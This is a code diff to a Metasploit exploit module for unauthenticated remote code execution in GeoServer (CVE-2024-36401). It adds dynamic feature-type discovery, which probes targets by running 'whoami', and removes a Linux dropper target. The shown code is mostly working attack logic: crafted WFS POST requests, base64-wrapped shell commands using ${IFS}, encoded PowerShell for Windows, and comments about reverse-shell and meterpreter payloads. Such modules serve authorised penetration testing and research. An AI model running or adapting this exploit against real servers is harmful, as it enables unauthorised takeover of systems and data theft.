dynamic feature type enhancement

Author: h00die-gr3y

modules/exploits/multi/http/geoserver_unauth_rce_cve_2024_36401.rb

@@ -7,7 +7,6 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
   prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(
@@ -31,7 +30,8 @@ def initialize(info = {})
         'Author' => [
           'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor
           'jheysel-r7', # MSF module Windows support
-          'Steve Ikeoka' # Discovery
+          'Steve Ikeoka', # Discovery
+          'Valentin Lobstein a.k.a chocapik' # Dynamic featuretype enhancement
         ],
         'References' => [
           ['CVE', '2024-36401'],
@@ -41,7 +41,7 @@ def initialize(info = {})
         ],
         'DisclosureDate' => '2024-07-01',
         'Platform' => ['unix', 'linux'],
-        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64, ARCH_AARCH64, ARCH_ARMLE],
+        'Arch' => [ARCH_CMD],
         'Privileged' => true,
         'Targets' => [
           [
@@ -51,17 +51,7 @@ def initialize(info = {})
               'Arch' => ARCH_CMD,
               'Type' => :unix_cmd
               # Tested with cmd/unix/reverse_bash
-            }
-          ],
-          [
-            'Linux Dropper',
-            {
-              'Platform' => ['linux'],
-              'Arch' => [ARCH_X86, ARCH_X64, ARCH_AARCH64, ARCH_ARMLE],
-              'Type' => :linux_dropper,
-              'Linemax' => 16384,
-              'CmdStagerFlavor' => ['curl', 'wget', 'echo', 'printf', 'bourne']
-              # Tested with linux/x64/meterpreter_reverse_tcp
+              # Tested with cmd/linux/http/x64/meterpreter/reverse_tcp
             }
           ],
           [
@@ -100,7 +90,7 @@ def check_version
       'keep_cookies' => true,
       'method' => 'GET'
     })
-    return nil unless res && res.code == 200 && res.body.include?('GeoServer Version')
+    return nil unless res&.code == 200 && res.body.include?('GeoServer Version')
 
     html = res.get_html_document
     unless html.blank?
@@ -112,7 +102,7 @@ def check_version
   end
 
   def get_valid_featuretype
-    allowed_feature_types = ['sf:archsites', 'sf:bugsites', 'sf:restricted', 'sf:roads', 'sf:streams', 'ne:boundary_lines', 'ne:coastlines', 'ne:countries', 'ne:disputed_areas', 'ne:populated_places']
+    # get a list of available feature types and test if the feature type is supporting the RCE
     res = send_request_cgi!({
       'uri' => normalize_uri(target_uri.path, 'geoserver', 'wfs'),
       'method' => 'GET',
@@ -123,36 +113,32 @@ def get_valid_featuretype
         'service' => 'wfs'
       }
     })
-    return nil unless res && res.code == 200 && res.body.include?('ListStoredQueriesResponse')
+    return nil unless res&.code == 200 && res.body.include?('ListStoredQueriesResponse')
 
     xml = res.get_xml_document
     unless xml.blank?
       xml.remove_namespaces!
       # get all the FeatureTypes and store them in an array of strings
       retrieved_feature_types = xml.xpath('//ReturnFeatureType')
       # shuffle the retrieved_feature_types array, and loop through the list of retrieved_feature_types from GeoServer
-      # return the feature type if a match is found in the allowed_feature_types array
+      # test and return the feature type if an RCE is possible
       retrieved_feature_types.to_a.shuffle.each do |feature_type|
-        return feature_type.text if allowed_feature_types.include?(feature_type.text)
+        return feature_type.text if execute_command('whoami', feature_type.text)
       end
     end
     nil
   end
 
-  def create_payload(cmd)
-    # get a valid feature type and fail back to a default if not successful
-    feature_type = get_valid_featuretype
-    feature_type = 'sf:archsites' if feature_type.nil?
-
+  def create_payload(cmd, feature_type)
     case target['Type']
-    when :unix_cmd || :linux_dropper
+    when :unix_cmd
       # create customised b64 encoded payload
       # 'Encoder' => 'cmd/base64' does not work in this particular use case
-      cmd_b64 = Base64.strict_encode64(cmd)
-      cmd = "sh -c echo${IFS}#{cmd_b64}|base64${IFS}-d|sh"
+      enc_cmd_b64 = Base64.strict_encode64(cmd)
+      cmd = "sh -c echo${IFS}#{enc_cmd_b64}|base64${IFS}-d|sh"
     when :win_cmd
-      enc_cmd = Base64.strict_encode64("cmd /C --% #{payload.encoded}".encode('UTF-16LE'))
-      cmd = "powershell.exe -e #{enc_cmd}"
+      enc_cmd_b64 = Base64.strict_encode64("cmd /C --% #{cmd}".encode('UTF-16LE'))
+      cmd = "powershell.exe -e #{enc_cmd_b64}"
     end
 
     return <<~EOS
@@ -166,15 +152,17 @@ def create_payload(cmd)
     EOS
   end
 
-  def execute_command(cmd, _opts = {})
+  def execute_command(cmd, feature_type, _opts = {})
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'geoserver', 'wfs'),
       'method' => 'POST',
       'ctype' => 'application/xml',
       'keep_cookies' => true,
-      'data' => create_payload(cmd)
+      'data' => create_payload(cmd, feature_type)
     })
-    fail_with(Failure::PayloadFailed, 'Payload execution failed.') unless res && res.code == 400 && res.body.include?('ClassCastException')
+    return false unless res&.code == 400 && res.body.include?('ClassCastException')
+
+    true
   end
 
   def check
@@ -190,11 +178,9 @@ def exploit
 
     case target['Type']
     when :unix_cmd, :win_cmd
-      execute_command(payload.encoded)
-    when :linux_dropper
-      # don't check the response here since the server won't respond
-      # if the payload is successfully executed.
-      execute_cmdstager({ linemax: target.opts['Linemax'] })
+      valid_feature_type = get_valid_featuretype
+      fail_with(Failure::NotFound, 'No valid featuretype found to estabish the RCE.') if valid_feature_type.nil?
+      fail_with(Failure::PayloadFailed, 'Payload execution failed.') unless execute_command(payload.encoded, valid_feature_type)
     end
   end
 end